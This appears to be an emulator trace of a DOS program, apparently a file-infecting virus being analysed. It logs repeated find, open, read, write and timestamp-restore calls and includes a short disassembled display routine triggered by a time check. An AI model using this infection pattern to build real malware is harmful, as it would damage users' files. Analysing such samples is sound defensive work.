2018-12-25T12:31:24.227700276Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.235184598Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.237594117Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.239306955Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.245631778Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.247254865Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.255171712Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.259899358Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.262765095Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.273568666Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.280510371Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.286618977Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.288561545Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.290934538Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.293008782Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.30221687Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.309823644Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.312279226Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.313857113Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.320056227Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.321326773Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.329688247Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.334159064Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.336689644Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.347115576Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.353735384Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.359983486Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.362089614Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.364401369Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.366321759Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.36957582Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.377073227Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.379518941Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.380934551Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.387465408Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.388789416Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.39703446Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.401441433Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.403891612Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.415090712Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.421568685Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.427746891Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.429756194Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.436672205Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.441119448Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.444246787Z 59 PC: 151ac | Change current directory
2018-12-25T12:31:24.448241293Z 71 PC: 151c9 | Get current directory
2018-12-25T12:31:24.455531612Z 59 PC: 151f3 | Change current directory
2018-12-25T12:31:24.465921597Z 59 PC: 1520e | Change current directory
2018-12-25T12:31:24.469719106Z 44 PC: 15212 | Get time 0x15212: cmp dx, 5
0x15215: ja 0x15239
0x15217: mov ax, 0xd
0x1521a: int 0x10
0x1521c: lea si, word ptr [bp + 0x3a4]
0x15220: cld
0x15221: lodsb al, byte ptr [si]
0x15222: or al, al
0x15224: je 0x15230
0x15226: mov ah, 0xe
0x15228: xor bh, bh
0x1522a: mov bl, 5
0x1522c: int 0x10
0x1522e: jmp 0x15220
0x15230: xor ax, ax
0x15232: int 0x16
0x15234: mov ax, 3
0x15237: int 0x10
0x15239: push ax
0x1523a: push bp
2018-12-25T12:31:24.471735006Z 26 PC: 15249 | Set disk transfer address
2018-12-25T12:31:24.473637433Z 9 PC: 12a51 | Display string (String= 'This is a sample! (10.000 bytes)')
2018-12-25T12:31:24.476203978Z 76 PC: 12a56 | Terminate with return code (Return code = '0')